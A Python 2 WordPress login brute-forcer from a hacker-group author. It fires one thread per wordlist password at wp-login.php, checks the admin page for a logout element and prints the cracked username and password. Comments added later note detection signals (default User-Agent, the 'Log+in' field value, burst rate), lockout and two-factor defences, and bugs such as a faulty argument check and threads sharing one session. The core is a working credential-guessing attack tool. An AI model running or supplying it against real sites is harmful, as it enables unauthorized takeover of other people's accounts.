code brute-force wordpress

#!/usr/bin/python 
# Video: http://youtu.be/mURnM-Yp72g 
# Coded By: xSecurity

import urllib, urllib2, os, sys, requests as xsec, re
from time import sleep
from threading import Thread
def cls():
    """Clear the terminal using the host platform's shell command."""
    # os.name is 'nt' on Windows, where the command is `cls`; every other
    # platform gets `clear`.
    if os.name == 'nt':
        command = 'cls'
    else:
        command = 'clear'
    os.system(command)
# Clear the terminal, then print the banner and usage text unconditionally
# (Python 2 print statement, so this file does not run under Python 3).
cls()
print '''
       __                      _ _         
__  __/ _\ ___  ___ _   _ _ __(_) |_ _   _ 
\ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
 >  < _\ \  __/ (__| |_| | |  | | |_| |_| |
/_/\_\\__/\___|\___|\__,_ |_|  |_|\__|\__, |
                                     |___/WordPress Brute Muliththreading :)
#Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
#Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin 
Special For My Lov3r Cyber-Crystal
#Usage: Python wp.py http://target.com/ admin pass.txt
#Note: U Need Install Requests Package: http://www.youtube.com/watch?v=Ng5T18HyA-Q'''

# Rebinds the name `xsec` from the `requests` module alias to one Session
# object. Every brute() call goes through this single session, so all login
# attempts share one cookie jar.
# Detection note: nothing in the visible code sets request headers, so the
# server logs requests' default User-Agent (python-requests/<version>).
xsec = xsec.session()
def brute(target,usr,pwd):
    """Try one username/password pair against a WordPress login form.

    Sends three requests through the shared module-level session ``xsec``:
    GET ``<target>/wp-admin/``, POST ``<target>/wp-login.php`` carrying the
    login form fields, then GET ``<target>/wp-admin``. The pair is reported
    as a hit when the last response contains the admin-bar logout element.

    Args:
        target: Base URL of the site; paths are appended by plain string
            concatenation.
        usr: Value sent in the ``log`` form field.
        pwd: Value sent in the ``pwd`` form field.

    Returns nothing. Prints the outcome and, on a hit, ends the whole process.

    Server-side view: each candidate password produces the same
    GET /wp-admin/ -> POST /wp-login.php -> GET /wp-admin triple from one
    client. Throttling or lockout on wp-login.php (per account and per
    source address) and a second authentication factor are the controls
    that blunt this pattern.
    """
    # The response is never inspected; the only effect is whatever cookies
    # the server sets on the shared session.
    get = xsec.get(target+'/wp-admin/')
    post = {}
    post["log"] = usr
    post["pwd"] = pwd
    # urlencode() below percent-encodes the '+', so the server decodes this
    # field as the literal text "Log+in". NOTE(review): the stock WordPress
    # form submits "Log In" (confirm against the deployed login template),
    # which would make this field value a usable log/WAF signature.
    post["wp-submit"] = "Log+in"
    post["redirect_to"] = target
    post["testcookie"] = "1"
    # The body is passed to requests as a pre-encoded string, not a dict.
    # The login response itself is not examined either.
    get2 = xsec.post(target+'/wp-login.php' , data=urllib.urlencode(post))
    # Success is inferred from this follow-up page. Because `xsec` is shared
    # by every thread, the cookies sent here may have been set by another
    # thread's POST, so the pair printed below is not guaranteed to be the
    # one that actually authenticated.
    get3 = xsec.get(target+'/wp-admin')
    # Plain substring match on the returned HTML.
    if '<li id="wp-admin-bar-logout">' in get3.text:
        print '[+] Cracked Username: '+usr+' & Password: '+pwd
        # os._exit ends the process immediately: no cleanup handlers run and
        # the remaining threads are not joined. The status is 1, so a calling
        # script sees a hit as a non-zero exit.
        os._exit(1)
    else:
        print '[~] Trying ...: '+pwd

# Command-line driver: target URL, username and wordlist path are read from
# sys.argv[1..3].
# NOTE(review): the guard admits len(sys.argv) == 3 (target and username
# only), yet sys.argv[3] is read below; that invocation raises IndexError
# instead of reaching the else branch.
if len(sys.argv) >= 3:
    target = sys.argv[1]
    usr = sys.argv[2]
    # Reads the whole wordlist into memory; the file object is never closed
    # explicitly. A trailing newline in the file yields an empty final entry,
    # which is counted in LIST and submitted like any other candidate.
    lst = open(sys.argv[3]).read().split("\n") 
    print '[*]Target: '+target
    print '[*]LIST:',len(lst)
    print '[*]Username: '+usr
    thrdlst = []
    # One thread per wordlist line, with no upper bound on live threads.
    # Starts are spaced 9 ms apart, so a single source can open on the order
    # of a hundred login attempts per second. That burst rate against
    # wp-login.php is what rate-limit and lockout rules should key on.
    for pwd in lst:
        t = Thread(target=brute, args=(target,usr,pwd))
        t.start()
        thrdlst.append(t)
        sleep(0.009)
    # Wait for every attempt to finish. This is reached only if no thread hit
    # the os._exit() path in brute().
    for b in thrdlst:
        b.join()
else:
    print '[>]There Somthing Missing Check ARGVS :)'
